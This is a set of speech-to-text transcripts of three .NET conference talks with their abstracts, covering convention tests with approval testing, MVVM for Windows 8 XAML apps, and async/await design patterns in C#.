convention is. It says that types where T is a concrete audit deduction, which means it's a class and it's an abstract, must have corresponding DTO. This is a very simple thing that looks up by the convention, deconstructs the name of the DTO, tries to locate the DTO type, and it tells me whether it's found the type or not. Now that I run this test, the way it's structured is I actually notice that this is not the N-unit test. There is no test attribute on the method. There is no test fixture attribute on the class, and there is no resharper helpers for running those tests. I actually run those tests by the test itself is in this run file, and it's a parameterized test. This is the test itself, and it takes those I convention tests, those types here, and then it runs them. This is so that I am forced, or the developers that do this are forced to have one single convention per class. This is a different one. Okay. So now, if I run that, each audit deduction has a DTO, well, the test will pass because I am conforming to my convention. That's great. But the interesting thing is if I, for example, go and I rename one of the DTOs, or I rename one of the audit deductions, right? So what happens now, if I run the test, if I run the test, that the test will fail. It fails, and it tells me invalid types found, and it's even nice enough to tell me what the type is. And it tells me that each audit deduction has a DTO. Notice that it doesn't even have underscores. This is to make it easier to read for people, the way I name the test, I plug into any unit and I even remove the underscores. So this is nice. We can even improve it better. We can make it better. Because it's not just about telling people that there is a problem. We want to go this extra step and tell them how to fix that problem. Or we want to tell them exactly what the problem is. We've seen that I said, well, there is an audit action that is missing a DTO. Well, okay. So what? Right? So I can say, well, this is the failed description. This is where I can say the first line of that message which says, well, there are audit actions that have DTOs missing, if we have that, we pay a lot of money to someone. Right? So we explain what the problem is and why it is a problem. And we can even be nice enough to say, well, okay, there is a DTO missing. I don't know what the DTO is supposed to be, where it's supposed to be. So I can specify a failed item description which will construct a message and it will tell me, well, what the expected DTO type name is for that particular type. So if I run this test again, and if we look here, the message now will be much more useful. It will say, there are audit action DTOs missing. There is all that message that I put in and it tells me, it expects an audit action DTOs which is the namespace bar audit action DTO for this audit action type. So this is actionable now. Now I know where I'm supposed to be looking at. Now I can go and look for that bar audit action DTO if it's there or if it's not there. Right? So this is one part of the coin. Another part of the coin is I started by looking at audit actions. But what if a new developer comes along and it looks from the UI and it knows there are all of those audit action things that it needs? So it will create an audit action DTO only and now it will expect it to work. Here is this convention magic thingy that will make it work. I don't really understand what it's doing, but it will make it work. And he expects this to happen, but it doesn't. This test will not fail because there is no audit action for this DTO. So we need another test. We need a test that will tell this developer, hey, you've created a DTO. Now we also need a corresponding audit action. So this would be a very simple test. This one. This would be a very simple test that will do the same thing, but from the other end. And this is important to do both of them. So that regardless of which approach people take on the project, those tests will fail and will fail consistently. So this is nice and easy. Not all works except in real life. Not all rules are all black and white. So in this case, you can say, well, every single audit action, no exception needs a DTO. But most rules that we have have exceptions to them. One example that we've had is we had a rule that said, well, DTOs, they are really just data containers that we pass along. So they should have no methods and they should have no static members because why would they? Right? But for particular aspect of the system, when we were integrating with a legacy application, we were not in control of the DTOs. And there was a DTO type that, well, was that conforming to that rule? It had a static method that looked something like that. It had a flag and we needed to know whether it's active or not, what the value of it is. So we had a convention, but it had an exception. And it kind of breaks this, our nice approach that we've had there because, well, it doesn't seem like there is an easy way to say, well, every single except for this one. Well, we can do that when we go here and we say, well, every type that is a concrete audited action needs to have a DTO or in that case would be, must not have a static member if it's a DTO or we might say, well, except if it's this one or that one or that one. But this kind of misses the point because the point of this test, among other things, one of the primary points of this test is to be readable. People will come to the project, people will read that code and they are supposed to understand it as quickly as possible. People will come back to parts of the code base that they haven't touched in six months and they should be able to read it and understand what it's doing. So we want to make those tests as simple as possible. So how do we do that? How do we accommodate those exceptional cases that don't really conform to the convention we've established? And a way to do that, so this is the convention that we have. So it has the same base class and it returns this type and it says, well, every type that name ends with DTO, this is how we define our DTOs, must have no static members. So this is a method somewhere here below that looks for static types using reflection. Very, very simple. We have the file description, we have the file item description when we say, well, which type and which members are static that we find on it. And then I have this additional method called it says with approved exceptions. And then we say, well, unless we parse string status. So this is a piece of text that explains why the exception exists. And if I run this test now, it will pass, but it will fail. Will it fail? It will pass, but it will fail if I do this. So let's disregard what I just did. We can cut it out, right? Okay. So I run this test now and this is my test. And it will fail, but it will fail in a very interesting way. And this will blow your mind if you haven't seen this before. Well, at least I know that it blew my mind the first time I've seen this. That is what happened. The test failed and my diff tool popped out. My diff tool popped out and it has the text, this exception message text that my convention is creating on one side and it has an empty file on the other side, right? And notice the file. This is a file named after the test that says received and on the other end it has the same file called approved. So this is the framework that I'm using here. I didn't create it, but it is really great. You should check it out. It's called approval tests. And approval test, what it does is it generates an output of your test, an expected output of your test, and then you look at the output and you approve it. And this is the, and it then gets persisted. And then you compare the subsequent runs of your test with the approved version. And so it will pass if nothing changes in the output, but it will fail if something changes. So in this case, I did not have that file because I just removed it. So the approved file is an empty file. And it says, well, static members found on a DTO types, on this DTO and this method. So now I can do very quickly without obscuring the code of my test is using all the power that my DIFT tool gives me, I can say, I approve of that. This is correct. This is fine. This is what it's supposed to be. We don't control this test. We don't control this, sorry. We don't control this DTO. This DTO is coming from a legacy system. So I now save that and I now click commit. And this is also important bit. I click commit. I commit that file to my repository so that all the other developers have the same approved file. And as I commit it, in the exception message, I say why I did that. Why this is okay for this file to be, for this type to be different than the convention specifies. And this is really powerful because what it gives you is it gives you a trail of those changes. As the project grows, if you find something you see that doesn't conform to the rule, you're not sure why. You can always look at that file in your blame tool. You can find the exact line that corresponds to that type and you can hopefully see a helpful message that will explain you. This is okay because of that, because this is a DTO from a legacy system. We need to integrate with it. We are not controlling how it works. Right? And this is really powerful and you can use that for many other things as well. You can use that not just for the things that you control but for things that are out of your control. You can use that to, let's go back to this example of WCF and behaviors. Here's a framework that we are using that applies behaviors to the WCF services but we do not see that. But why not use this tool? Why not use approval testing and then generate an approved file that all it does is it lists the behaviors that are applied to every single service that we've got. And then we can very easily open that file and look at it. If something changes, if a new behavior comes along or if a behavior for whatever reason does not get applied, this test will fail and your DTO will exactly show you in which lines it's failed, which behavior existed and doesn't exist anymore. This really is very powerful. If you will remember one thing from that talk, remember this. Use approval test to validate things, to raise the visibility of the things that you do not normally see. So for example, what we could do is if you are using Windsor as your container or any other container for that matter. I'm using Windsor because, well, I use Windsor. But you can do the same thing with every other container. So for example, the problem with containers is there are those components registered in them and they expose services and they have lifestyles. But you kind of have to know the place where they are and you need to know how your framework works exactly. Well why not put it all out there in an approval test and have an approval test with a proofed file that will list all the registered components in your container. So you can write a test that will generate you this. It will register everything in your container and then it will tell you, well, you have four components. You have audit service class which exposes I audit service as a service is transient. You have I mapper. I don't know what it's implemented by because so it's laid bound and it's a singleton. I have local file system and I have time service. They are both singletons. This is very empowering, very useful and it increases the confidence of people on your team. The fact that they can look at those things and they can know what gets registered. And I will not even tell you how many times I found this very useful where I was trying to diagnose something. And then I could look at the file and I immediately could see whether a type is registered or if it's that registered. I expected it to be a transient and it's a singleton. And you can take it even further. With many frameworks, you can inspect statically things that are wrong with it. So for example, with Windsor, you can statically inspect the components that Windsor thinks are misconfigured that they have dependencies that are missing. So this is the first file which says that the following components come up as potentially unresolvable and it's empty. So it's good. All of my components can be resolved according to Windsor. But if I then go and so let's find a component, let's take it to service. So I add a dependency here, one that's not being registered. Right? Say I principle, that's fine. Okay? So I now run this test. So imagine I'm a normal developer, I work with something. I expected that I principle will be registered. I think it's fine. So I just added, I keep working and I run my test and now a failure. I didn't expect it to happen. This helped me from committing not working code even without running that code. If this was a service that is called only once in a blue moon, if I didn't have that, think what would be the chances to finding that, right? And using this tool, using this approach, I've shortened the feedback cycle. I immediately, right after compiling and running my test, know there is a problem. And Windsor is even nice enough to tell me what the problem is. It tells me some dependencies of this component could not be static, let me make it wider, could not be statically resolved, right? It tells me which component. I have audit service which is waiting for the following dependencies for I principle. Well and I principle has not been registered. This really is very powerful. And you can use it not just for your IOC containers, you can use it for every single framework or for every single convention that you have in your system. Make the implicit things that happen in those frameworks explicit. So for example, if you use Fluent and Hibernate to generate your mappings, why not output them to a file, the XML that gets generated, and then make an approval test out of it, right? And then it will dramatically increase the confidence that your team has in those tools and it will make them much easier to work with. It will decrease the amount of problems that you are facing. And I'm speaking from experience, right? And we've got some time, so maybe I will quickly just show you how those Windsor component, Windsor test works. They are slightly different and that's why this framework has dependency on Windsor. So for this case, I have the base class is Windsor convention test which returns Windsor convention data. And then it takes a configured container. So I create the container, I register components using installers from my other assembly, not the test assembly, but the one that has the actual code. And then in this case, by definition, I don't need to say anything. It will just look at all the handlers. So all I really need to do is just nicely format the description for each of them. The other test, the one that lists the components that are misconfigured, this is using the diagnostics from Windsor. So it's a Windsor convention test of I potentially misconfigured components diagnostic. Windsor has a set of those for different things. For example, it will tell you when you have a per web request, when you have a single ton that depends on a per web request component, which generally is a really bad thing. It will tell you when you have service locator usage or things like that. So this again is very, very simple thing. All the logic is not really relevant hidden from you in the base class. So all you really care about is you then again create your convention data, you put the container in it so that it can inspect it, and then you say you just specify the fail description and for fail item description. So this is very simple to work with, very simple to read, and it tells you that this is only potential. So this is yes, this is an important thing to understand when working with Windsor that those are potentially misconfigured components. And this is again why we are using approval test for that, because it may be okay for certain of those things to exist. Windsor only statically can go that far. So it will tell you, well, I think that you will not be able to resolve this object because it's missing some dependencies. But if the dependencies are provided dynamically at runtime, it will work just fine. So you can then approve that and you can say, I know of that, I realize what the ramifications are but this is fine, that's correct. Let's proceed. Right? And a very important thing happened here. Okay. Let's first recap what I did. So no matter how, no matter if you take this approach or a different approach, I'm not trying to sell you that nugget that I just shown you, this is just what I've been using on different projects and it has proven useful to me, it might not necessarily be useful to you. But whatever you do, be consistent. Remember that this is supposed to be read by many people over and over during the lifetime of your project. So make it consistent, make it easy to read because this is your executable documentation. This is replacing. This is executable version of this SharePoint document that you've got. List the offenders. Don't just say that, well, there are audited actions that are missing DTOs. That's it. Just say which of them are missing DTOs. Explain what the problem is. Why is it bad that they are missing the DTOs? What's going to happen if they don't have one? Maybe tell people how to solve that or maybe you can just say, well, go talk to John. That can also be fine. Test negative cases. Don't assume that people will approach the problem from the same angle every single time. You may start by creating your audit detection first and then if you've got tested approaches it's only from the audit detection DTO and it will not fail. And then people will be left scratching their heads thinking, why is it not working? Use approval testing for exception to the rule. And again, this is a very powerful tool and the integration with your DIFTools, if you use powerful DIFTools, will really easily and nicely visually show you what has changed, where it has changed. This is a really powerful tool. And use approval testing to make what's implicit, explicit, remove the glass door and then people will not freak out when working with conventions in your system. And what it gives you is you no longer have just the basic validation of at the syntactic level of that C-sharp compiler is giving you. This will create application-specific compiler that will validate the rules that are specific to your application. And those are not the only benefits of conventions. Conventions also establish common ways of handling recurring classes of problems. So, for example, this is how we set up our client server configuration. They help you reduce complexity by having just one way of solving one particular set of problems. We do it this way and only this way. And then if you have tests, the test will tell you where you've deviated from the single way so that you can fix it, you can adjust it. And they facilitate discussion when you've deviated. You've got a test. You've got a new class that is, say, a new service or a new view model, for example, just not to stick to WCF for too long. So you've got a different view model that is different than all the other view models that you've got. Using conventions, this facilitates your discussion because you've got your convention and then your test fails telling you, well, there's something different about this view model. There's an exception in the test. Well, then you hopefully grab someone who has worked with them or maybe the senior person or some other developers. You gather together and you look at it and you discuss, why is it different? Is it OK that it's different? Well, maybe we just approve that exception using approval test and go on. Maybe the convention is no longer right. Maybe the convention does not, has only very narrow look at the world, but this is a valid case for this to happen. So you change your convention. Or maybe this is simply a bug and then you just change the view model and it conforms to the rule. But what is really important is that it makes us talk to other people. Otherwise, without those tests, we would just say, oh, come on, move on, right? So what I found by using conventions is that they make happier developers because we write less brain dead code. We have more fun code to write. We outsource all of the boring things to tools and to conventions. They do the work for us and we concentrate on the actual problems that our customers want us to solve. And with that, we deliver better projects sooner. And this is it. We've got three minutes left, so if there are any questions, I will take them now. And if not, well, then thank you very much. There's a question there. I'm sorry, I cannot hear you. Can you speak up? Yes, source code will be available on my GitHub page. OK, then thank you very much.
|
C# (or Java) developers looking to cut down amount of repetitive boilerplate code but wary to let go of safe harbour of compile time checking Approach of incorporating conventions to cut down on repetitive boilerplate code has been around for several years. How can we apply this approach in a staticaly typed language, like C#, to best leverage its strenghts while retaining benefits of the language and .NET plaftorm? This talk will push the boundaries of your knowledge about using conventions. You will learn how to properly apply the aproach to dramatically cut down on the code no-one wants to write, and how to build application specific "compiler" to validate your conventions. And have fun along the way.
|
10.5446/50980 (DOI)
|
So, I guess it's time, right? Can you guys hear? Himi, okay? Yeah? Okay, so don't listen to what he says. Listen to what I say, okay? Cool. So welcome to the courageous who woke up in the morning. We are going to talk about MVVM. And most especially, I think the purpose of this talk is really to tell you that there is no need to panic. I think that's really what I would like you to take back home. It's, you know, every time a new framework comes out, right? We hear all kinds of fearful comments about the end of the world approaching. And what I would like to show you is really that Windows 8 is different from what we did before Windows RT. But there are also so many similarities that every, basically, you know, when you start, you feel at home quite fast. And then you discover the differences and we have to work around those differences. And this is really what the talk is about. My name is Laurent Buignon. I work for Identity Mine. We are a user experience company. We work with different technologies. So I would say our favorite is XAML. We are, Identity Mine was born from XAML, I would say. And it makes us really happy to see XAML used on a large number of platforms. We currently develop for, you know, civil IWPF, obviously, but also more and more for consumer-oriented applications such on the Xbox, for example. We also do a lot of work with the Kinect. We work for Surface. We work for Windows Phone, etc. So it's really opening up and XAML is running on a large number of platforms. And the interesting thing is that those principles that we learned in WPF back then and then since then in civilized, etc. apply very well to all those worlds. For the small story, small anecdote is that those applications that are developed for Xbox, civilized is used there. So this is a version of civilized which is used on the Xbox. And the MBVM light actually is used in many of those applications. So again, same principle, supply, whatever the screen is, whatever the size of the devices, you can use that. Which is a nice feeling. It's quite convenient. So today I want to talk to you about MBVM and let's start with a small recap so that we are all on the same page. So when we talk about those separation patterns in UI, we of course have to start with MVC because that's the most famous, that's where it all started. MVC is very old. It was developed around 1984 back then with Smalltalk, who coded some Smalltalk in his life. Nobody else? Wow. That was an interesting language which was mostly developed I think for research purpose, but actually there are some applications which actually run in Smalltalk. And it was the first language where everything was an object and when asked what is an object, the usual answer was well, that's an object. So everything was an object, right? And this is really the very first fully object oriented language. So, you know, MVC is very famous. It's used everywhere. We have of course ASP.NET MVC. We have Ruby on Rails. It's also an MVC based framework. And the idea here is that you have the model, the model being wherever your data comes from. It can be a collection of web services. It can be a database, etc. You have a view, which is what the user is seeing and actuating and using, right? And then the controller is there to coordinate all that. So it's a little bit like the director for an orchestra. This is an object which is very powerful. So it goes a little bit into the concept of good object. It can do really a lot in your application. Some would argue maybe a little bit too much. And of course, this is an object that the application cannot live without. In XAML based frameworks, the concept of controller is probably not the best, mostly because of the data binding system. So when we have data binding, it makes sense to move to something else, which is the MVDM pattern. So here we again have the model. We again have the view. The main difference is that the controller is not a big controller for the application, but we have one small controller per view. Of course, your mileage may vary. So sometimes we have one view model for multiple views. Sometimes we have views without view models. It depends. But basically the idea being that you have this pair view, view model. At the view model to model level, no big changes, same principle supply as before. So you have events, you have methods, calls and all that. The big difference is really between the view and the view model, where we use data binding. Data binding, so the data binding system is very powerful. It also allows you to create those binding in a declarative manner, meaning that you don't write code for that. You write some markup. And there is a big advantage to writing markup, first of all, because by nature the data binding system is loosely coupled, which means that you can write at design time in your application a data template, which is not placed in the context of any data context at all, and you can write your bindings. And then those bindings are going to be applied when the application runs. That loose coupling has disadvantages too, right? It means that it is difficult to debug data binding, because the data binding will never throw an exception when the data source is null, because this is loosely coupled. That's the nature of that. The power of it is really this loose coupling, the fact that you can, in a very separate timeline, you can define your data object, and then later, another role, maybe even another person, can define how the UI is going to react to those data. And also, data bindings are great for the tools. So we'll see examples with blend later, because markup is great for the tools. Of course, data bindings work well there too. Now, sometimes the view needs to communicate to the view model in a more elaborate way, in a more advanced way, than just with data bindings. And for that, we like to use commands. Commands are a way to expose a method, to expose a functionality as a property, and then we can use data binding to bind, for example, a button or a UI element to those commands. And then in the other direction, sometimes, again, the view model needs to communicate with the view in a more elaborate way than with data bindings. For example, if you need to start and coordinate animations in a precise way, then you probably need to do something in the view. And in that case, I'm going to show you how to use something called view services to do that. Another way would be to use a messenger of some type, a type of event bus. And you have different ways to do that. So we'll talk about that. When you do that, when you go from the view model to the view, one component which is nice to use is the behavior. Okay, behaviors are very powerful. They are a way to encapsulate a piece of view code, and then to reuse it later in your application. It's very convenient. It's very tool-able as well. So it's very bindable. The nice way, very blendable, I mean, sorry, the nice thing is that you communicate with your behaviors with data binding. So again, you have this advantage of this loose coupling between your view model and your view. Imagine that you have a property on the view model which is true or false or maybe an enumeration. And then in your view, you want to control animations based on that. Well, you can do that with the behavior, and the view model doesn't have to worry about what's going to happen in the view. Okay, so it's very nice. It's also very blendable. Behaviors are very easy to drag and drop and configure in expression blend. Which is, of course, an advantage because it means that a non-technical person, such as a designer, for example, can do the work. Now, behaviors have a big disadvantage. It's that they don't exist on Windows 8. So in Windows 8, we need to find workarounds. Let me say yet at this point. They don't exist yet. I think that everybody agrees that they are very, very useful. And who knows? I think at some point in the future, we might see them, but I don't have information on when that may happen. Right now, we have to use workarounds.
|
The Model-View-ViewModel pattern is a common denominator between applications using XAML to create the user interface. First applied in WPF, it was then easily ported to Silverlight and Windows Phone development. With WinRT and the Metro-style applications, XAML is now a first-class citizen for native Windows 8 development. Here too, the MVVM pattern is making developers' life easier, and proven components can be used to simplify and speed up application development. In this session, Laurent Bugnion, the creator of the acclaimed MVVM Light Toolkit, will present best practices around XAML-based Windows 8 application development, and how to leverage code and skills in Windows 8 too.
|
10.5446/50982 (DOI)
|
And I commend you for sitting through two of these, by the way. I've been looking forward to give this talk for ages. I've been really wanting to give the advanced async talk. But whenever I've done it in the past, whenever I've gone to conferences, people have told me, oh, we've only got one slot for you. So I've always been stuck to the basic things. This is my first time. It actually... What I wanted to share with you was the async design patterns that we, inside Microsoft, have developed from the past two years experience of using async. Best patterns, best practices, recommended patterns, exciting patterns. The first third of the talk will be very heavily code focused on those design patterns based on what we've learned. Middle chunk of the talk will be about the real world. It will be about you've got a legacy application and there are lots of comments throughout it saying, warning, do not alter this code. It's probably synchronous up there. And now you're adding a new bit here and you're using a new library and you want it to be async and you're wondering, well, how do I tie into the stuff? Or just how do I integrate async into my existing world? Maybe synchronous or maybe event-based. Final third of the talk is slides only and it will be about the details of the code generation. It will be about as much of the code generation as I thought was important for you to understand some principles behind it, particularly around performance and how to think about that. And in the third talk, I'll be going on to the ASP side of things. The rest of it's universal. Just before I started, I quite wanted to... I wanted to share this way of looking at it. Looking at await versus callback, event-based programming style. On the left is how we'd write it using await things. On the right is how we'd write it using callbacks. I suppose... What to notice about it is that this semicolon operator, probably you don't even think about it as an operator, but it is an operator in the language. It's the operator for sequential composition. It doesn't exist in the callback world. So callbacks do not even work with the tiniest operator in the language. How about if statements? If B, then await statement 1a, await statement 1b, and then await statement 2. We tried to write this using callbacks. It would be if B, do statement 1a, followed by a callback to statement 2, otherwise 1b, with a callback to statement 2. Basically, we've had to duplicate statement 2. So callback style does not compose with if blocks. How about a while loop? I'm sorry, that's a hideous pink. It looks clearly better on my screen. Anyway, for each with an await inside it, that's fairly nice, how on earth would you write a for each loop using callbacks? Answer, you can't do a for each. I'm not actually even sure that this code is correct. The reason is that it's a using clause here, but we should end the using after all of our statement 1s have been completed, rather than just the first one has been completed, and I don't think it's got it right. Oh, well, I mean the message is very clear, that we're in the world, we've left the world of callback programming because it's a bad, bad world to be in. Anyway, design patterns. This slide just summarizes all of them. Once again, all of this talk and all of the code in it will be on my website in a week or so, so you don't need to write anything. I'm just going to go straight to code, and let's see where we go with that. I'll return to the slide and we'll see what we've done. I started with a WPF application this time. Once again, pretty simple, and I'm sorry for doing such simplistic examples all the time. I really wanted to have complete working code. This one is calling await loadpics, and loadpics follows the task async pattern. It's got the async modifier, it returns a task. Actually, I should have called it async, shouldn't I? That's part of the pattern. What it's doing is getting the path to the My Pictures folder. It's going to accumulate all of the results. It's enumerating all of the files, the JPEGs in that folder, and then it's loading them, calling a helper function that I wrote, load bitmap async, add it into my results, and it's updating the UI just as feedback so I can see that it's running. Then I stuck this await task.delay just so that user interface didn't get overwhelmed and bogged down in this work. If I run it, pretty straightforward, I hit the loadpics button, and it goes through a bunch of holiday snapshots. Okay, let's do something with it. We already talked about cancellation. That's pretty easy. Let's just add that. CTS equals new cancellation token source, and button two dot click plus equals... Once again, on the inner loop, it will throw the exception if it's been requested. Once again, I should run this in a try block to protect against cancellation. What I've done here, just to keep the code small and local, is I signed up the cancel handler right inside my code. What's ugly is that here, there isn't a good separation of concerns. The function that does loadpics async is also updating the UI. I would love for this just to be the function that loads the pictures, and somewhere else in my code updates the UI accordingly. It could have been with the data bound list. That would be a natural WPF way to do it, but I'm going to show you another way, which is more general and works arbitrarily in the task asynchronous pattern. Let's start by writing a delegate, which will listen for progress. I've created this progress object using the new progress type, and I put a delegate inside it. My idea is that whenever the method wants to report that it's made some progress, then I will hook up my progress handler to it. Let's pass it to it. It's a standard part of the task asynchronous pattern that if you wish to support cancellation, you stick it as the last parameter. If you want to support progress, stick it as the second last parameter, or use optional parameters if you want. I'm going to use the same parameter that I've created for the previous task. I'm going to use the same parameter that I've created for the previous task. I'm going to use the same parameter or use optional parameters if you want. Instead of modifying the UI directly inside my logic, I'm going to say if progress.null.report.bmp. That's the best way to do progress. Now, if I run it, I hit load pics, and it's updating the UI from the correct place in my code. It's updating it from the button handler rather than the logic. There's something interesting about this way of doing it, using the progress concrete type and the eye progress interface, is that this progress type will automatically marshal things from wherever it was into the appropriate synchronization context. That's not important in this case because we're running this method load pics async on the UI thread. But if we're running it on the background thread, or if it was anything like that, the reported progress, it would automatically get progress back in the correct place. The next thing I want to talk about, okay, so that's number one item, progress is part of the task asynchronous pattern. Next thing I want to talk about, this await task.delayof1000, I said for UI responsiveness. Why is that? Well, let's try seeing what happens if it's not there. I do load pics. My application is just frozen solid. Why is that? It's frozen solid, even though I've got a weight in here. Finally, it did something. It froze solid because my work was actually chiefly CPU bound. The bitmap loader I had saw that it was trying to load a file from disk, and so it chose to do it synchronously because it knew it could do it quickly rather than asynchronously, and so it finished immediately. And because this loop was just running so tight, the user interface thread almost never got a chance to do anything with itself, never got a chance to update. This is the old familiar problem. You might be thinking, damn it, has a weight not helped me at all? Well, it looks like it hasn't. So what are we going to do about this? The load delay of one second was a bit of a goofy way to get around it because it slowed everything down. What we'd really like to do is run as quickly as possible without interfering with UI responsiveness. So let's put a weight task.yield and run it. Oops. It hasn't helped at all. I led you down the wrong path. This is, I thought, a bad API. We thought it was a good idea when we were creating it, but suddenly the release candidate for Visual Studio closed down, and we realized it's a bad API. It doesn't fulfill the communist need people have of it. We couldn't remove it because we just can't remove things at this late stage in the game, but we did the next best thing, which is add a more useful... Okay, I'm sorry. Ah, because you're down there, you can only see. Okay, gotcha. We did the next best thing. Wait, dispatch.yield. Actually, I can tell you why it doesn't work, and it should have been obvious to us just at the first point. When we say, I wish to yield control to the UI thread, intrinsic in that is a notion that we wish to yield to things more important than us. And task.yield doesn't have a parameter to say what things are more important than us. Therefore, it's technically impossible for it to do what we want it to do. And indeed, there's no cross framework notion of levels of importance. I mean, there's something in WPF, and I'm going to use that, but I'm going to use the yield of dispatcher priority.idle. What that says is that... Why doesn't that work? Don't application idle. What that says is that everything that's more important, including the UI, including redrawing it, should happen before I get back from this yield statement. I wish to yield at the priority level of application idle. And if I run it this time, then it updates more quickly and it's showing all of the things correctly, and it lets me drag better. Let's close that. I just wanted to do something on cancel.image1.source equals null. What I've shown you here is the WPF way that you can yield control in a busy loop to let the UI regain some chance. Question. What are the other ways, good ways to do it? What is a good way to yield in WinForms or Metro in Win8? For that, please read Stephen Talb's blog. He's been writing posts on this topic, and he has the better answers. There's still something pretty ugly about this code, you know. What's ugly about it is that dispatcher.yield is totally part of my UI layer. It's not part of the logic layer, and yet it's inside my logic function. So the question is, how can we promote this to outside it? I'm going to show you a beautiful pattern that we've been using from time to time. Let's delete all of this. Delete all of this. And start from scratch. Interface, iAsyncEnumerator of t. Task of bool, move next, async. And tCurrentGet. If you've looked at the regular.net iEnumerator interface, this is almost the same, except the regular enumerator just has a bool returning synchronous move next method. I wanted to generalize it to an asynchronous move next method. And of course that makes sense. I mean, imagine you're enumerating through rows in a database. You're probably going to cache them. You've got 100 rows at a time. Each time you call move next, it might return immediately if it's already in the cache, but if it has to fetch the next batch of 100 rows, then it might take a long time. So what's the move next method that will take time before it can give you the answer of whether there is or there is not more data? Well, how are we going to use that? We're going to create a method. In fact, let's put it down here. iAsyncEnumerator of bitmapImageEnumerator equals loadPixAsync2. And then I'll implement it. Actually, I won't do it yet. I've got the enumerator while await end.moveNextAsync. Image1.source equals end.current awaitDispatcher.yield of dispatcher. OK, that's pretty good. What we've got here is a pattern where all of the UI layer happens in the UI, where the UI can control the rate at which it asks for more data. If the UI isn't ready for more data, it won't ask for more data. And the function loadPixAsync2 can also control the rate at which it sends data. If it has nothing available, then it won't give anything. I think this is a beautiful pattern. Do you know what it looks like? It looks like a stream. A stream is something where it's got a fixed buffer, maybe 1k or so, and the producer can put stuff into the stream, but he might block if it's full, and the consumer might take things out of it, but he might block if it's empty. So we've basically implemented what is conceptually a stream. Well, except we haven't implemented it. The other one is not implemented, exception. ViewToolBox. Here's one I implemented earlier. This is the time when I wish I had a code monkey to help me with it. Okay. I knew that I wished to return some object that implements the IAsync enumerator interface, and I just had to throw it together, and it's not conceptually difficult what we'll do, so I'm not going to spend too more time on it than is justified. All that my function loadPixAsync does is it constructs an instance of this object, loadPixEnumerator, that I created for this purpose, and I pass it the relevant information, a cancellation token, and the enumerator over the list of files in the directory, and then as for the implementation of the loadPixEnumerator, it has this method moveNextAsync, which says if cancellation has been requested, I'm just going to return false. I'm not going to continue doing anything. If also there are no more files in the directory, then I'm going to return false. Otherwise, I'm going to load the current file name as a bitmap into this current thing and return true, indicating that there is data, so that when someone comes to fetch the current property, they'll find what they were after. Some of you might have seen IAsyncEnumerator already. That's because it was shipped as part of the Rx framework, the reactive extensions, and they use it extensively, and this is exactly the same thing. Wouldn't it be beautiful though if instead of doing... where are we? Inside the button click handler, we do this while await. Wouldn't it be beautiful if we could do forEach await, far, pick, in, loadPixAsyncTo? It would be great if we had some async version of the forEach loop, which called the moveNextAsync rather than a regular one. Unfortunately, we don't have it. Why don't we have it? Partly, it was quite difficult to implement, and it would take us extra time. But more generally, it would have made this pattern a bit too easy. I'm quite serious about this, because what we're writing here is a whole bunch of code that is creating an entire object. It's got a load of state. It has moveNextAsync. It's a very chatty interface. Imagine if we did use this for database rows, and imagine if we got batches of 1,000 at a time, and imagine if you invoke this async moveNext function for every one of those thousand rows. Most of the time, the async function would return immediately, and you'd be incurring the overhead cost of an async method without much benefit. You might be misled into using this pattern too frequently and having a chatty interface that winds up being inefficient. What we've ended up with is it's not too difficult to use, and it's very clear what you're doing, and you're clear that you're using it frequently, and you're clear about the chattiness, and that's just the roadblock, the speed bump, to make you stop and think. That said, I was on the side that wanted it to get into the language. LAUGHTER Let's try something else. I've talked to the last talk about void returning asyncs, and one of the loudest complaints we've had is, why do you have void returning asyncs? Because they're dangerous, basically. All of the code that you write, apart from the top-level event handlers, should be returning task or task of T. It should not be returning void. But then people ask, well, I wish to launch something in a Fire and Forget manner. In fact, let's do some of it. Let's... Up here. Let's wait for some computational work to happen, and I'll get it out of the toolbox. No, I won't. I'll generate it from source. OK. And I'll get it out of the toolbox. I've got a really stupid Fire and Forget task that I want to run here. All it does is change the label content, then it invokes a helper function to download a bunch of data, then it uses task.run with a computeFastForearTransform function that runs it on the thread pool, so it's not to interfere with UI responsiveness, and then it updates the UI and says, hey, I've finished with FastForearTransform, and I run it. It shows the... Once it's finished, it says finishedFFT, and it gets on with the regular work. But I think to myself, wait, that doesn't make sense. I would like it to do the work in the background. I don't want to wait for it right here and now. I just want to leave it running. One way I might do that is delete the await word. Well, that will certainly start it running, and it won't wait for it to finish. A warning pops up. It says, warning. I'm sorry, I didn't increase the font size. It says, warning. Because this call is not awaited, execution of the current method continues before the call is completed. Consider applying the await operator to your call. You think to yourself, well, I didn't want to apply the await operator. I just wanted to let it run in the background. Let's do it properly. Let's say task t equals do work async, and then at the end of the method, I can await t. It's a really good pattern. When if you launch something async, just await for it at the right time, maybe later, maybe like I was using this outstanding list of tasks, but wait for it somewhere. How about if I really thought I was being smart, and I didn't want to do that, and I didn't do this, the warning message just says, warning, it returns a task, but you're not awaiting it. So I thought, huh, I can make this a void returning async. Ha, ha, ha, ha. Question. What will happen in this case if an exception is thrown somewhere? Where does the exception get thrown from a void returning async method? It can't be thrown back to the caller, because the caller has already executed this statement. It's probably executed the rest. It might well have left the entire message. The answer is, if you have a void returning async method with an unhandled exception, then the exception would be propagated to the calling synchronization context. It will pop up to the UI thread in this case. That's really bad programming. You know, it's bad to have exceptions being unhandled, throwing up to the top. The only way I can imagine this being legitimate... Let me say that again. The only time I think it is legitimate to have a void returning async is either if you're at the top level event handler, or it's normal for top-level event handlers if they have unhandled exceptions to throw them up to the UI, or if your void returning method never catches any exceptions. But then you think, wait a minute, it's just written a catch-all exception. That's bad practice. Yes, it is bad practice. So you shouldn't really be doing it. You should always be awaiting, either directly or indirectly, all asynchronous things you do because of this danger of exceptions. Or if you really want to do it... Let's try another way around it. Have it return task. Having it always return task is a good thing, because it means that if one user wants to launch it in a Fire and Forget method, they can. But if another user wants to wait till it's finished, then they can. So returning task gives the maximum flexibility. The recommendation is far dummy equals. I saved it into a dummy variable just to get the compiler to shut up with its warning. That's not good practice. The person reading my code says, why do you do this? So, note, I used dummy because I... guarantee that do work async throws no exceptions, and I want to launch it Fire and Forget. Our recommendation is, if you're using this trick of assigning to a dummy to silence the warning, always put an explanation somewhere in your code. Or if you want to just do it more generally, you could make an extension method, let's say, Fire and Forget. Something like that. Some clear indication to the user that you know what you're doing, and that this is safe, and be aware of adding any exceptions to the method. That's our recommendation on that part. Let me give you another recommendation. Look at this routine. Await task.run of delegate of library.compute.fft. At this point, the guy who wrote the compute.fft library function is thinking, what a pain. My consumers are probably all going to be using task.run. So why don't I offer them a task.run async version of my compute bound work? Let's see what that would look like. I've already got the compute.fft. function. If you look carefully, you might notice that it doesn't 